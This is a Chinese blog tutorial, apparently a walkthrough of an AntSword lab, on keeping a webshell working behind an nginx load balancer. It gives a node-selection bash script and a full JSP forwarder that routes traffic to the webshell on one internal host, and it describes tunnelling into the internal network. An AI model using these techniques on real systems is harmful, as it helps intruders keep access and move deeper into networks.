目录
环境
问题
访问的ip会变动
执行命令的服务器未知
上传大文件损坏
深入内网
解决方案
环境
ps :现在已经拿下服务器了,要解决的是负载均衡问题,
以下是docker环境:
链接: https://pan.baidu.com/s/1cjMfyFbb50NuUtk6JNfXNQ?pwd=1aqw
提取码: 1aqw
在/root/AntSword-Labs-master/loadbalance/loadbalance-jsp路径下开启容器
查看:
浏览器测试下能打开,然后直接用蚁剑连接
问题
访问的ip会变动
负载均衡原理这里不讲了
这里的现象就是在两台服务器上转换,所以想要连接成功, 那就每个服务器都要上传后门即可解决
执行命令的服务器未知
就是在执行命令时,不知道是哪个服务器执行的,那就多执行几次,也可以轻松解决
上传大文件损坏
因为是负载均衡,所以上传大一点的文件会被拆开分到不同服务器上导致文件损失,尽量上传小文件,也能行
深入内网
目标服务器不能出内网,但是它有web服务器部署在外网
所以就把隧道上传到目标服务器,与web服务器连接, 就可以把web服务器当成代理进入内网
这样由于负载均衡,传输数据传到一半可能中断传输,就无法建立连接。
解决方案
1.关一台服务器,不让负载均衡,理论上可行,但是不切实际,真实环境犯法
2.筛选出指定ip再执行
写个脚本,然后给两个服务器都上传
#!/bin/bash
MYIP=$(hostname -i)
if [ "$MYIP" == "172.19.0.2" ]; then
echo -e "Node1. 执行命令。\n=======\n"
hostname -i
else
echo "其他节点。请重试。"
fi
然后执行:
但是这样无法解决上传文件、出内网问题,仅适用执行命令的情况
3.在web层面做一次http流量转发
由于这两台服务器互相是可以访问的,那么思路就是在其中一台服务器上做流量转发
目的就是无论访问哪台服务器,最终流量都去往同一台服务器
这里提供一个流量转发的脚本:
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%@ page import="java.io.DataInputStream" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.security.KeyManagementException" %>
<%@ page import="java.security.NoSuchAlgorithmException" %>
<%@ page import="java.security.cert.CertificateException" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%!
public static void ignoreSsl() throws Exception {
HostnameVerifier hv = new HostnameVerifier() {
public boolean verify(String urlHostName, SSLSession session) {
return true;
}
};
trustAllHttpsCertificates();
HttpsURLConnection.setDefaultHostnameVerifier(hv);
}
private static void trustAllHttpsCertificates() throws Exception {
TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {
public X509Certificate[] getAcceptedIssuers() {
return null;
}
@Override
public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
// Not implemented
}
@Override
public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
// Not implemented
}
} };
try {
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, trustAllCerts, new java.security.SecureRandom());
HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
} catch (KeyManagementException e) {
e.printStackTrace();
} catch (NoSuchAlgorithmException e) {
e.printStackTrace();
}
}
%>
<%
String target = "http://172.20.0.2:8080/ant.jsp";
URL url = new URL(target);
if ("https".equalsIgnoreCase(url.getProtocol())) {
ignoreSsl();
}
HttpURLConnection conn = (HttpURLConnection)url.openConnection();
StringBuilder sb = new StringBuilder();
conn.setRequestMethod(request.getMethod());
conn.setConnectTimeout(30000);
conn.setDoOutput(true);
conn.setDoInput(true);
conn.setInstanceFollowRedirects(false);
conn.connect();
ByteArrayOutputStream baos=new ByteArrayOutputStream();
OutputStream out2 = conn.getOutputStream();
DataInputStream in=new DataInputStream(request.getInputStream());
byte[] buf = new byte[1024];
int len = 0;
while ((len = in.read(buf)) != -1) {
baos.write(buf, 0, len);
}
baos.flush();
baos.writeTo(out2);
baos.close();
InputStream inputStream = conn.getInputStream();
OutputStream out3=response.getOutputStream();
int len2 = 0;
while ((len2 = inputStream.read(buf)) != -1) {
out3.write(buf, 0, len2);
}
out3.flush();
out3.close();
%>
直接上传文件会被分片损坏,所以在蚁剑上直接新建文件,多保存几次即可
然后修改蚁剑的连接并测试:
文章来源:https://www.toymoban.com/news/detail-667461.html
原文链接:https://blog.csdn.net/vt_yjx/article/details/132273609文章来源地址https://www.toymoban.com/news/detail-667461.html
到了这里,关于解决nginx的负载均衡下上传webshell的问题的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
